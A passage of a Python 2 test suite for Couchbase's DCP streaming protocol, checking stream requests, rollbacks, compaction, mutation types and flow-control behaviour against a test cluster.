stream = self.dcp_client.stream_req(0, 0, 0, 0, 0, 0)
assert stream.opcode == CMD_STREAM_REQ
end = stream.next_response()
assert end and end['opcode'] == CMD_STREAM_END
"""Stream request with invalid vbucket
Opens a producer connection and then tries to create a stream with an
invalid VBucket. Should get a not my vbucket error."""
def test_stream_request_invalid_vbucket(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.stream_req(1025, 0, 0, MAX_SEQNO, 0, 0)
assert response.status == ERR_NOT_MY_VBUCKET
response = self.mcd_client.stats('dcp')
assert 'eq_dcpq:mystream:stream_0_opaque' not in response
assert response['eq_dcpq:mystream:type'] == 'producer'
"""Stream request for invalid connection
Try to create a stream over a non-dcp connection. The server should
disconnect from the client"""
@unittest.skip("Needs Debug")
def test_stream_request_invalid_connection(self):
response = self.dcp_client.stream_req(0, 0, 0, MAX_SEQNO, 0, 0)
assert response.status == ERR_ECLIENT
response = self.mcd_client.stats('dcp')
assert 'eq_dcpq:mystream:type' not in response
"""Stream request for consumer connection
Try to create a stream on a consumer connection. The server should
disconnect from the client"""
def test_stream_request_consumer_connection(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.stream_req(0, 0, 0, MAX_SEQNO, 0)
assert response.status == ERR_ECLIENT
response = self.mcd_client.stats('dcp')
assert 'eq_dcpq:mystream:type' not in response
"""Stream request with start seqno bigger than end seqno
Opens a producer connection and then tries to create a stream with a start
seqno that is bigger than the end seqno. The stream should be closed with an
range error. Now we are getting a client - still correct"""
def test_stream_request_start_seqno_bigger_than_end_seqno(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.stream_req(0, 0, MAX_SEQNO, MAX_SEQNO / 2, 0, 0)
assert response.status == ERR_ECLIENT or response.status == ERR_ERANGE
response = self.mcd_client.stats('dcp')
assert 'eq_dcpq:mystream:stream_0_opaque' not in response
# dontassert response['eq_dcpq:mystream:type'] == 'producer'
"""Stream requests from the same vbucket
Opens a stream request for a vbucket to read up to seq 100. Then sends another
stream request for the same vbucket. Expect a EXISTS error and dcp stats
should refer to initial created stream."""
def test_stream_from_same_vbucket(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.stream_req(0, 0, 0, MAX_SEQNO, 0)
assert response.status == SUCCESS
response = self.mcd_client.stats('dcp')
assert response['eq_dcpq:mystream:type'] == 'producer'
created = response['eq_dcpq:mystream:created']
assert created >= 0
response = self.dcp_client.stream_req(0, 0, 0, 100, 0)
assert response.status == ERR_KEY_EEXISTS
response = self.mcd_client.stats('dcp')
assert response['eq_dcpq:mystream:created'] == created
"""Basic dcp stream request (Receives mutations)
Stores 10 items into vbucket 0 and then creates an dcp stream to
retrieve those items in order of sequence number.
"""
def test_stream_request_with_ops(self):
# self.mcd_client.stop_persistence()
doc_count = snap_end_seqno = 10
for i in range(doc_count):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
mutations = 0
last_by_seqno = 0
stream = self.dcp_client.stream_req(0, 0, 0, doc_count, 0, 0)
assert stream.status == SUCCESS
stream.run()
self.wait_for_persistence(self.mcd_client)
assert stream.last_by_seqno == doc_count
self.verification_seqno = doc_count
"""Receive mutation from dcp stream from a later sequence
Stores 10 items into vbucket 0 and then creates an dcp stream to
retrieve items from sequence number 7 to 10 on (4 items).
"""
def test_stream_request_with_ops_start_sequence(self):
# self.mcd_client.stop_persistence()
for i in range(10):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
resp = self.mcd_client.stats('vbucket-seqno')
end_seqno = int(resp['vb_0:high_seqno'])
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
high_seqno = long(resp['vb_0:0:seq'])
start_seqno = 7
stream = self.dcp_client.stream_req(
0, 0, start_seqno, end_seqno, vb_uuid)
assert stream.status == SUCCESS
responses = stream.run()
mutations = \
len(filter(lambda r: r['opcode'] == CMD_MUTATION, responses))
assert stream.last_by_seqno == 10
assert mutations == 3
self.verification_seqno = 10
def set_keys_with_timestamp(self, count):
for i in range(count):
self.mcd_client.set('key' + str(i), 0, 0, str(time.time()), 0)
self.sleep(0.010)
""" Concurrent set keys and stream them. Verify that the time between new arrivals
is not greater than 10 seconds
"""
def test_mutate_stream_request_concurrent_with_ops(self): # ******
doc_count = snap_end_seqno = 10000
t = Thread(target=self.set_keys_with_timestamp, args=(doc_count,))
t.start()
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
mutations = 0
last_by_seqno = 0
stream = self.dcp_client.stream_req(0, 0, 0, doc_count, 0, 0)
assert stream.status == SUCCESS
results = stream.run()
# remove response like this
# {'snap_end_seqno': 30, 'arrival_time': 1423699992.195518, 'flag': 'memory', 'opcode': 86, 'snap_start_seqno': 30, 'vbucket': 0}
resultsWithoutSnap = [x for x in results if 'key' in x]
pauses = []
i = 1
while i < len(resultsWithoutSnap):
if resultsWithoutSnap[i]['arrival_time'] - resultsWithoutSnap[i - 1]['arrival_time'] > 10:
pauses.append('Key {0} set at {1} was streamed {2:.2f} seconds after the previous key was received. '.
format(resultsWithoutSnap[i]['key'],
datetime.fromtimestamp(
float(resultsWithoutSnap[i - 1]['value'])).strftime('%H:%M:%S'),
resultsWithoutSnap[i]['arrival_time'] - resultsWithoutSnap[i - 1]['arrival_time'],
datetime.fromtimestamp(
float(resultsWithoutSnap[i - 1]['value'])).strftime('%H:%M:%S')))
i = i + 1
# print 'Number of pause delays:', len(pauses)
if len(pauses) > 0:
if len(pauses) < 20: # keep the output manageable
for i in pauses:
print i
else:
for i in range(20):
print pauses[i]
assert False, 'There were pauses greater than 10 seconds in receiving stream contents'
assert stream.last_by_seqno == doc_count
"""Basic dcp stream request (Receives mutations/deletions)
Stores 10 items into vbucket 0 and then deletes 5 of thos items. After
the items have been inserted/deleted from the server we create an dcp
stream to retrieve those items in order of sequence number.
"""
def test_stream_request_with_deletes(self):
# self.mcd_client.stop_persistence()
for i in range(10):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
for i in range(5):
self.mcd_client.delete('key' + str(i), 0, 0)
resp = self.mcd_client.stats('vbucket-seqno')
end_seqno = int(resp['vb_0:high_seqno'])
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
last_by_seqno = 0
stream = self.dcp_client.stream_req(0, 0, 0, end_seqno, 0)
assert stream.status == SUCCESS
responses = stream.run()
mutations = \
len(filter(lambda r: r['opcode'] == CMD_MUTATION, responses))
deletions = \
len(filter(lambda r: r['opcode'] == CMD_DELETION, responses))
assert mutations == 5
assert deletions == 5
assert stream.last_by_seqno == 15
self.verification_seqno = 15
"""
MB-13386 - delete and compaction
Stores 10 items into vbucket 0 and then deletes 5 of those items. After
the items have been inserted/deleted from the server we create an dcp
stream to retrieve those items in order of sequence number.
"""
def test_stream_request_with_deletes_and_compaction(self):
for i in range(1, 4):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
self.sleep(2)
for i in range(2, 4):
self.mcd_client.delete('key' + str(i), 0, 0)
self.sleep(2)
resp = self.mcd_client.stats('vbucket-seqno')
end_seqno = int(resp['vb_0:high_seqno'])
self.wait_for_persistence(self.mcd_client)
# drop deletes is important for this scenario
self.mcd_client.compact_db('', 0, 2, 5, 1) # key, bucket, purge_before_ts, purge_before_seq, drop_deletes
# wait for compaction to end - if this were a rest call then we could use active tasks but
# as this an mc bin client call the only way known (to me) is to sleep
self.sleep(20)
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
last_by_seqno = 0
self.sleep(5)
stream = self.dcp_client.stream_req(0, 0, 0, end_seqno, 0)
assert stream.status == SUCCESS
responses = stream.run()
print 'responses', responses
mutations = \
len(filter(lambda r: r['opcode'] == CMD_MUTATION, responses))
deletions = \
len(filter(lambda r: r['opcode'] == CMD_DELETION, responses))
assert deletions == 1, 'Deletion mismatch, expect {0}, actual {1}'.format(2, deletions)
assert mutations == 1, 'Mutation mismatch, expect {0}, actual {1}'.format(1, mutations)
assert stream.last_by_seqno == 5
"""
MB-13479 - dedup and compaction
Set some keys
Consumer consumes them
Delete one of the set keys
Compaction - dedup occurs
Request more of the stream - there should be a rollback so the the consumer does not bridge the dedup
"""
def test_stream_request_with_dedup_and_compaction(self):
KEY_BASE = 'key'
for i in range(1, 4):
self.mcd_client.set(KEY_BASE + str(i), 0, 0, 'value', 0)
self.sleep(2)
resp = self.mcd_client.stats('vbucket-seqno')
end_seqno = int(resp['vb_0:high_seqno'])
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
# consume the first 3 keys
stream = self.dcp_client.stream_req(0, 0, 0, 3, 0)
assert stream.status == SUCCESS
responses = stream.run()
# and delete one from the original batch
for i in range(2, 4):
self.mcd_client.delete(KEY_BASE + str(i), 0, 0)
# set a couple more keys
self.mcd_client.set(KEY_BASE + str(5), 0, 0, 'value', 0)
self.mcd_client.set(KEY_BASE + str(5), 0, 0, 'value', 0)
self.mcd_client.compact_db('', 0, 3, 5, 1) # key, bucket, ...
self.sleep(10)
# and now get the stream
# def stream_req(self, vbucket, takeover, start_seqno, end_seqno,
# vb_uuid, snap_start = None, snap_end = None):
stream = self.dcp_client.stream_req(0, 0, 3, 6, 0)
assert stream.status == ERR_ROLLBACK
@unittest.skip("Broken: needs debugging")
def test_stream_request_backfill_deleted(self):
""" verify deleted mutations can be streamed after backfill
task has occured """
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
# set 3 items and delete delete first 2
self.mcd_client.set('key1', 0, 0, 'value', 0)
self.mcd_client.set('key2', 0, 0, 'value', 0)
self.mcd_client.set('key3', 0, 0, 'value', 0)
self.mcd_client.set('key4', 0, 0, 'value', 0)
self.mcd_client.set('key5', 0, 0, 'value', 0)
self.mcd_client.set('key6', 0, 0, 'value', 0)
self.wait_for_persistence(self.mcd_client)
self.mcd_client.delete('key1', 0, 0)
self.mcd_client.delete('key2', 0, 0)
backfilling = False
tries = 10
while not backfilling and tries > 0:
# stream request until backfilling occurs
self.dcp_client.stream_req(0, 0, 0, 5,
vb_uuid)
stats = self.mcd_client.stats('dcp')
num_backfilled = \
int(stats['eq_dcpq:mystream:stream_0_backfilled'])
backfilling = num_backfilled > 0
tries -= 1
self.sleep(2)
assert backfilling, "ERROR: backfill task did not start"
# attempt to stream deleted mutations
stream = self.dcp_client.stream_req(0, 0, 0, 3, vb_uuid)
response = stream.next_response()
""" Stream request with incremental mutations
Insert some ops and then create a stream that wants to get more mutations
then there are ops. The stream should pause after it gets the first set.
Then add some more ops and wait from them to be streamed out. We will insert
the exact amount of items that the should be streamed out."""
def test_stream_request_incremental(self):
for i in range(10):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
stream = self.dcp_client.stream_req(0, 0, 0, 20, 0)
assert stream.status == SUCCESS
stream.run(10)
assert stream.last_by_seqno == 10
for i in range(10):
self.mcd_client.set('key' + str(i + 10), 0, 0, 'value', 0)
# read remaining mutations
stream.run()
assert stream.last_by_seqno == 20
self.verification_seqno = 20
"""Send stream requests for multiple
Put some operations into four different vbucket. Then get the end sequence
number for each vbucket and create a stream to it. Read all of the mutations
from the streams and make sure they are all sent."""
def test_stream_request_multiple_vbuckets(self):
num_vbs = 4
num_ops = 10
for vb in range(num_vbs):
for i in range(num_ops):
self.mcd_client.set('key' + str(i), 0, 0, 'value', vb)
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
streams = {}
stats = self.mcd_client.stats('vbucket-seqno')
for vb in range(4):
en = int(stats['vb_%d:high_seqno' % vb])
stream = self.dcp_client.stream_req(vb, 0, 0, en, 0)
streams[vb] = {'stream': stream,
'mutations': 0,
'last_seqno': 0}
while len(streams) > 0:
for vb in streams.keys():
if streams[vb]['stream'].has_response():
response = streams[vb]['stream'].next_response()
if response['opcode'] == 87:
assert response['by_seqno'] > streams[vb]['last_seqno']
streams[vb]['last_seqno'] = response['by_seqno']
streams[vb]['mutations'] = streams[vb]['mutations'] + 1
else:
assert streams[vb]['mutations'] == num_ops
del streams[vb]
"""
Sends a stream request with start seqno greater than seqno of vbucket. Expects
to receive a rollback response with seqno to roll back to
"""
@unittest.skip("Needs Debug")
def test_stream_request_rollback(self):
response = self.dcp_client.open_producer("rollback")
assert response['status'] == SUCCESS
self.mcd_client.set('key1', 0, 0, 'value', 0)
self.mcd_client.set('key2', 0, 0, 'value', 0)
vb_id = 'vb_0'
vb_stats = self.mcd_client.stats('vbucket-seqno')
fl_stats = self.mcd_client.stats('failovers')
fail_seqno = long(fl_stats[vb_id + ':0:seq'])
vb_uuid = long(vb_stats[vb_id + ':uuid'])
rollback = long(vb_stats[vb_id + ':high_seqno'])
start_seqno = end_seqno = 3
stream = self.dcp_client.stream_req(0, 0, start_seqno, end_seqno, vb_uuid)
assert stream.status == ERR_ROLLBACK
assert stream.rollback == rollback
assert stream.rollback_seqno == fail_seqno
start_seqno = end_seqno = rollback
stream = self.dcp_client.stream_req(0, 0, start_seqno - 1, end_seqno, vb_uuid)
stream.run()
assert end_seqno == stream.last_by_seqno
self.verification_seqno = end_seqno
"""
Sends a stream request with start seqno greater than seqno of vbucket. Expects
to receive a rollback response with seqno to roll back to. Instead of rolling back
resend stream request n times each with high seqno's and expect rollback for each attempt.
"""
@unittest.skip("Needs Debug")
def test_stream_request_n_rollbacks(self):
response = self.dcp_client.open_producer("rollback")
assert response['status'] == SUCCESS
vb_stats = self.mcd_client.stats('vbucket-seqno')
vb_uuid = long(vb_stats['vb_0:uuid'])
for n in range(1000):
self.mcd_client.set('key1', 0, 0, 'value', 0)
by_seqno = n + 1
stream = self.dcp_client.stream_req(0, 0, by_seqno + 1, by_seqno + 2, vb_uuid)
assert stream.status == ERR_ROLLBACK
assert stream.rollback_seqno == 0
"""
Send stream request command from n producers for the same vbucket. Expect each request
to succeed for each producer and verify that expected number of mutations are received
for each request.
"""
def test_stream_request_n_producers(self):
clients = []
for n in range(10):
client = DcpClient(self.cluster.master.ip, self.cluster.master.port)
op = client.open_producer("producer:%s" % n)
assert op['status'] == SUCCESS
clients.append(client)
for n in range(1, 10):
self.mcd_client.set('key%s' % n, 0, 0, 'value', 0)
for client in clients:
stream = client.stream_req(0, 0, 0, n, 0)
# should never get rollback
assert stream.status == SUCCESS, stream.status
stream.run()
# stream changes and we should reach last seqno
assert stream.last_by_seqno == n, \
"%s != %s" % (stream.last_by_seqno, n)
self.verification_seqno = stream.last_by_seqno
[client.close() for client in clients]
def test_stream_request_needs_rollback(self):
# load docs
self.mcd_client.set('key1', 0, 0, 'value', 0)
self.mcd_client.set('key2', 0, 0, 'value', 0)
self.mcd_client.set('key3', 0, 0, 'value', 0)
# failover uuid
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
# vb_uuid does not exist
self.dcp_client.open_producer("rollback")
resp = self.dcp_client.stream_req(0, 0, 1, 3, 0, 1, 1)
assert resp and resp.status == ERR_ROLLBACK
assert resp and resp.rollback == 0
# snap_end > by_seqno
resp = self.dcp_client.stream_req(0, 0, 1, 3, vb_uuid, 1, 4)
assert resp and resp.status == SUCCESS, resp.status
# snap_start > by_seqno
resp = self.dcp_client.stream_req(0, 0, 4, 4, vb_uuid, 4, 4)
assert resp and resp.status == ERR_ROLLBACK, resp.status
assert resp and resp.rollback == 3, resp.rollback
# fallthrough
resp = self.dcp_client.stream_req(0, 0, 7, 7, vb_uuid, 2, 7)
assert resp and resp.status == ERR_ROLLBACK, resp.status
assert resp and resp.rollback == 3, resp.rollback
def test_stream_request_after_close(self):
"""
Load items from producer then close producer and attempt to resume stream request
"""
doc_count = 100
self.dcp_client.open_producer("mystream")
for i in xrange(doc_count):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
self.sleep(2)
self.wait_for_persistence(self.mcd_client)
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
stream = self.dcp_client.stream_req(0, 0, 0, doc_count,
vb_uuid)
stream.run(doc_count / 2)
self.dcp_client.close()
self.dcp_client = DcpClient(self.cluster.master.ip, self.cluster.master.port)
self.dcp_client.open_producer("mystream")
stream = self.dcp_client.stream_req(0, 0, stream.last_by_seqno,
doc_count, vb_uuid)
while stream.has_response():
response = stream.next_response()
if response['opcode'] == CMD_MUTATION:
# first mutation should be at location we left off
assert response['key'] == 'key' + str(doc_count / 2)
break
def test_stream_request_notifier(self):
"""Open a notifier consumer and verify mutations are ready
to be streamed"""
doc_count = 100
response = self.dcp_client.open_notifier("notifier")
assert response['status'] == SUCCESS
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
notifier_stream = \
self.dcp_client.stream_req(0, 0, doc_count - 1, 0, vb_uuid)
for i in range(doc_count):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
response = notifier_stream.next_response()
assert response['opcode'] == CMD_STREAM_END
self.dcp_client = DcpClient(self.cluster.master.ip, self.cluster.master.port)
response = self.dcp_client.open_producer("producer")
assert response['status'] == SUCCESS
stream = self.dcp_client.stream_req(0, 0, 0, doc_count, 0)
assert stream.status == SUCCESS
stream.run()
assert stream.last_by_seqno == doc_count
self.verification_seqno = doc_count
def test_stream_request_notifier_bad_uuid(self):
"""Wait for mutations from missing vb_uuid"""
response = self.dcp_client.open_notifier("notifier")
assert response['status'] == SUCCESS
# set 1
self.mcd_client.set('key', 0, 0, 'value', 0)
# create notifier stream with vb_uuid that doesn't exist
# expect rollback since this value can never be reached
vb_uuid = 0
stream = self.dcp_client.stream_req(0, 0, 1, 0, 0)
assert stream.status == ERR_ROLLBACK, \
"ERROR: response expected = %s, received = %s" % \
(ERR_ROLLBACK, stream.status)
def test_stream_request_append(self):
""" stream appended mutations """
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
val = 'base-'
self.mcd_client.set('key', 0, 0, val, 0)
for i in range(100):
self.mcd_client.append('key', str(i), 0, 0)
val += str(i)
self.sleep(1)
stream = self.dcp_client.stream_req(0, 0, 0, 100, 0)
assert stream.status == SUCCESS
responses = stream.run()
assert stream.last_by_seqno == 101
assert responses[1]['value'] == val
self.verification_seqno = 101
def test_stream_request_prepend(self):
""" stream prepended mutations """
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
val = 'base-'
self.mcd_client.set('key', 0, 0, val, 0)
for i in range(100):
self.mcd_client.prepend('key', str(i), 0, 0)
val = str(i) + val
self.sleep(1)
stream = self.dcp_client.stream_req(0, 0, 0, 100, 0)
assert stream.status == SUCCESS
responses = stream.run()
assert stream.last_by_seqno == 101
assert responses[1]['value'] == val
self.verification_seqno = 101
def test_stream_request_incr(self):
""" stream mutations created by incr command """
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
val = 'base-'
self.mcd_client.incr('key', init=0, vbucket=0)
for i in range(100):
self.mcd_client.incr('key', amt=2, vbucket=0)
self.sleep(1)
stream = self.dcp_client.stream_req(0, 0, 0, 100, 0)
assert stream.status == SUCCESS
responses = stream.run()
assert stream.last_by_seqno == 101
assert responses[1]['value'] == '200'
self.verification_seqno = 101
def test_stream_request_decr(self):
""" stream mutations created by decr command """
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
val = 'base-'
self.mcd_client.decr('key', init=200, vbucket=0)
for i in range(100):
self.mcd_client.decr('key', amt=2, vbucket=0)
self.sleep(1)
stream = self.dcp_client.stream_req(0, 0, 0, 100, 0)
assert stream.status == SUCCESS
responses = stream.run()
assert stream.last_by_seqno == 101
assert responses[1]['value'] == '0'
self.verification_seqno = 101
def test_stream_request_replace(self):
""" stream mutations created by replace command """
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
val = 'base-'
self.mcd_client.set('key', 0, 0, 'value', 0)
for i in range(100):
self.mcd_client.replace('key', 0, 0, 'value' + str(i), 0)
self.sleep(1)
stream = self.dcp_client.stream_req(0, 0, 0, 100, 0)
assert stream.status == SUCCESS
responses = stream.run()
assert stream.last_by_seqno == 101
assert responses[1]['value'] == 'value99'
self.verification_seqno = 101
@unittest.skip("needs debug")
def test_stream_request_touch(self):
""" stream mutations created by touch command """
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
val = 'base-'
self.mcd_client.set('key', 100, 0, 'value', 0)
self.mcd_client.touch('key', 1, 0)
stream = self.dcp_client.stream_req(0, 0, 0, 2, 0)
assert stream.status == SUCCESS
responses = stream.run()
assert stream.last_by_seqno == 2
assert int(responses[1]['expiration']) > 0
self.wait_for_persistence(self.mcd_client)
stats = self.mcd_client.stats()
num_expired = stats['vb_active_expired']
if num_expired == 0:
self.verification_seqno = 2
else:
assert num_expired == 1
self.verification_seqno = 3
def test_stream_request_gat(self):
""" stream mutations created by get-and-touch command """
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
val = 'base-'
self.mcd_client.set('key', 100, 0, 'value', 0)
self.mcd_client.gat('key', 1, 0)
stream = self.dcp_client.stream_req(0, 0, 0, 2, 0)
assert stream.status == SUCCESS
responses = stream.run()
assert stream.last_by_seqno == 2
assert int(responses[1]['expiration']) > 0
self.wait_for_persistence(self.mcd_client)
stats = self.mcd_client.stats()
num_expired = int(stats['vb_active_expired'])
if num_expired == 0:
self.verification_seqno = 2
else:
assert num_expired == 1
self.verification_seqno = 3
def test_stream_request_client_per_vb(self):
""" stream request muataions from each vbucket with a new client """
for vb in xrange(8):
for i in range(1000):
self.mcd_client.set('key' + str(i), 0, 0, 'value', vb)
num_vbs = len(self.all_vbucket_ids())
for vb in xrange(8):
dcp_client = DcpClient(self.cluster.master.ip, self.cluster.master.port)
dcp_client.open_producer("producerstream")
stream = dcp_client.stream_req(
vb, 0, 0, 1000, 0)
mutations = stream.run()
try:
assert stream.last_by_seqno == 1000, stream.last_by_seqno
self.verification_seqno = 1000
finally:
dcp_client.close()
def test_stream_request_mutation_with_flags(self):
self.dcp_client.open_producer("mystream")
self.mcd_client.set('key', 0, 2, 'value', 0)
stream = self.dcp_client.stream_req(0, 0, 0, 1, 0)
snap = stream.next_response()
res = stream.next_response()
item = self.mcd_client.get('key', 0)
assert res['flags'] == 2
assert item[0] == 2
@unittest.skip("Needs Debug")
def test_flow_control(self):
""" verify flow control of a 128 byte buffer stream """
response = self.dcp_client.open_producer("flowctl")
assert response['status'] == SUCCESS
buffsize = 128
response = self.dcp_client.flow_control(buffsize)
assert response['status'] == SUCCESS
for i in range(5):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
stream = self.dcp_client.stream_req(0, 0, 0, 5, 0)
required_ack = False
while stream.has_response():
resp = stream.next_response()
if resp is None:
ack = self.dcp_client.ack(buffsize)
assert ack is None, ack['error']
required_ack = True
assert stream.last_by_seqno == 5
assert required_ack, "received non flow-controlled stream"
self.verification_seqno = 5
" MB-15213 buffer size of zero means no flow control"
def test_flow_control_buffer_size_zero(self):
""" verify no flow control for a 0 byte buffer stream """
response = self.dcp_client.open_producer("flowctl")
assert response['status'] == SUCCESS
buffsize = 0
response = self.dcp_client.flow_control(buffsize)
assert response['status'] == SUCCESS
for i in range(5):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
stream = self.dcp_client.stream_req(0, 0, 0, 5, 0)
required_ack = False
# consume the stream
while stream.has_response():
resp = stream.next_response()
assert stream.last_by_seqno == 5
@unittest.skip("Needs Debug")
def test_flow_control_stats(self):
""" verify flow control stats """
buffsize = 128
self.dcp_client.open_producer("flowctl")
self.dcp_client.flow_control(buffsize)
self.mcd_client.set('key1', 0, 0, 'valuevaluevalue', 0)
self.mcd_client.set('key2', 0, 0, 'valuevaluevalue', 0)
self.mcd_client.set('key3', 0, 0, 'valuevaluevalue', 0)
def info():
stats = self.mcd_client.stats('dcp')
acked = stats['eq_dcpq:flowctl:total_acked_bytes']
unacked = stats['eq_dcpq:flowctl:unacked_bytes']
sent = stats['eq_dcpq:flowctl:total_bytes_sent']
return int(acked), int(sent), int(unacked)
# all stats 0
assert all(map(lambda x: x == 0, info()))
stream = self.dcp_client.stream_req(0, 0, 0, 3, 0)
self.sleep(10) # give time for the stats to settle
acked, sent, unacked = info()
assert acked == 0
if unacked != sent:
print "test_flow_control_stats unacked %d sent %d" % (unacked, sent)
self.log.info("test_flow_control_stats unacked %d sent %d" % (unacked, sent))
assert unacked == sent
# ack received bytes
last_acked = acked
while unacked > 0:
ack = self.dcp_client.ack(buffsize)
acked, sent, unacked = info()
assert acked == last_acked + buffsize
last_acked = acked
stream.run()
assert stream.last_by_seqno == 3
self.verification_seqno = 3
@unittest.skip("Needs Debug")
def test_flow_control_stream_closed(self):
""" close and reopen stream during with flow controlled client"""
response = self.dcp_client.open_producer("flowctl")
assert response['status'] == SUCCESS
buffsize = 128
response = self.dcp_client.flow_control(buffsize)
assert response['status'] == SUCCESS
end_seqno = 5
for i in range(end_seqno):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
stream = self.dcp_client.stream_req(0, 0, 0, end_seqno, vb_uuid)
max_timeouts = 10
required_ack = False
last_seqno = 0
while stream.has_response() and max_timeouts > 0:
resp = stream.next_response()
if resp is None:
# close
self.dcp_client.close_stream(0)
# ack
ack = self.dcp_client.ack(buffsize)
assert ack is None, ack['error']
required_ack = True
# new stream
stream = self.dcp_client.stream_req(0, 0, last_seqno,
end_seqno, vb_uuid)
assert stream.status == SUCCESS, \
"Re-open Stream failed"
max_timeouts -= 1
elif resp['opcode'] == CMD_MUTATION:
last_seqno += 1
# verify stream closed
assert last_seqno == end_seqno, "Got %s" % last_seqno
assert required_ack, "received non flow-controlled stream"
self.verification_seqno = end_seqno
def test_flow_control_reset_producer(self):
""" recreate producer with various values max_buffer bytes """
sizes = [64, 29, 64, 777, 32, 128, 16, 24, 29, 64]
for buffsize in sizes:
self.dcp_client = DcpClient(self.cluster.master.ip, self.cluster.master.port)
response = self.dcp_client.open_producer("flowctl")
assert response['status'] == SUCCESS
response = self.dcp_client.flow_control(buffsize)
assert response['status'] == SUCCESS
stats = self.mcd_client.stats('dcp')
key = 'eq_dcpq:flowctl:max_buffer_bytes'
conn_bsize = int(stats[key])
assert conn_bsize == buffsize, \
'%s != %s' % (conn_bsize, buffsize)
def test_flow_control_set_buffer_bytes_per_producer(self):
""" use various buffer sizes between producer connections """
def max_buffer_bytes(connection):
stats = self.mcd_client.stats('dcp')
key = 'eq_dcpq:%s:max_buffer_bytes' % connection
return int(stats[key])
def verify(connection, buffsize):
self.dcp_client = DcpClient(self.cluster.master.ip, self.cluster.master.port)
response = self.dcp_client.open_producer(connection)
assert response['status'] == SUCCESS
response = self.dcp_client.flow_control(buffsize)
assert response['status'] == SUCCESS
producer_bsize = max_buffer_bytes(connection)
assert producer_bsize == buffsize, \
"%s != %s" % (producer_bsize, buffsize)
producers = [("flowctl1", 64), ("flowctl2", 29), ("flowctl3", 128)]
for producer in producers:
connection, buffsize = producer
verify(connection, buffsize)
@unittest.skip("Needs Debug")
def test_flow_control_notifier_stream(self):
""" verifies flow control still works with notifier streams """
mutations = 100
# create notifier
response = self.dcp_client.open_notifier('flowctl')
assert response['status'] == SUCCESS
self.dcp_client.flow_control(16)
# vb uuid
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
# set to notify when seqno endseqno reached
notifier_stream = self.dcp_client.stream_req(0, 0, mutations + 1, 0, vb_uuid)
# persist mutations
for i in range(mutations):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
self.wait_for_persistence(self.mcd_client)
tries = 10
while tries > 0:
resp = notifier_stream.next_response()
if resp is None:
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
else:
if resp['opcode'] == CMD_STREAM_END:
break
tries -= 1
assert tries > 0, 'notifier never received end stream'
def test_flow_control_ack_n_vbuckets(self):
self.dcp_client.open_producer("flowctl")
mutations = 2
num_vbs = 8
buffsize = 64 * num_vbs
self.dcp_client.flow_control(buffsize)
for vb in range(num_vbs):
self.mcd_client.set('key1', 0, 0, 'value', vb)
self.mcd_client.set('key2', 0, 0, 'value', vb)
# request mutations
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
for vb in range(num_vbs):
self.dcp_client.stream_req(vb, 0, 0, mutations, vb_uuid)
# ack until all mutations sent
stats = self.mcd_client.stats('dcp')
unacked = int(stats['eq_dcpq:flowctl:unacked_bytes'])
start_t = time.time()
while unacked > 0:
ack = self.dcp_client.ack(unacked)
assert ack is None, ack['error']
stats = self.mcd_client.stats('dcp')
unacked = int(stats['eq_dcpq:flowctl:unacked_bytes'])
assert time.time() - start_t < 150, \
"timed out waiting for seqno on all vbuckets"
stats = self.mcd_client.stats('dcp')
for vb in range(num_vbs):
key = 'eq_dcpq:flowctl:stream_%s_last_sent_seqno' % vb
seqno = int(stats[key])
assert seqno == mutations, \
"%s != %s" % (seqno, mutations)
self.wait_for_persistence(self.mcd_client)
assert self.get_persisted_seq_no(vb) == seqno
def test_consumer_producer_same_vbucket(self):
# producer stream request
response = self.dcp_client.open_producer("producer")
assert response['status'] == SUCCESS
stream = self.dcp_client.stream_req(0, 0, 0, 1000, 0)
assert stream.status is SUCCESS
# reopen conenction as consumer
dcp_client2 = DcpClient(self.cluster.master.ip, self.cluster.master.port)
response = dcp_client2.open_consumer("consumer")
assert response['status'] == SUCCESS
# response = dcp_client2.add_stream(0, 0)
# assert response['status'] == SUCCESS
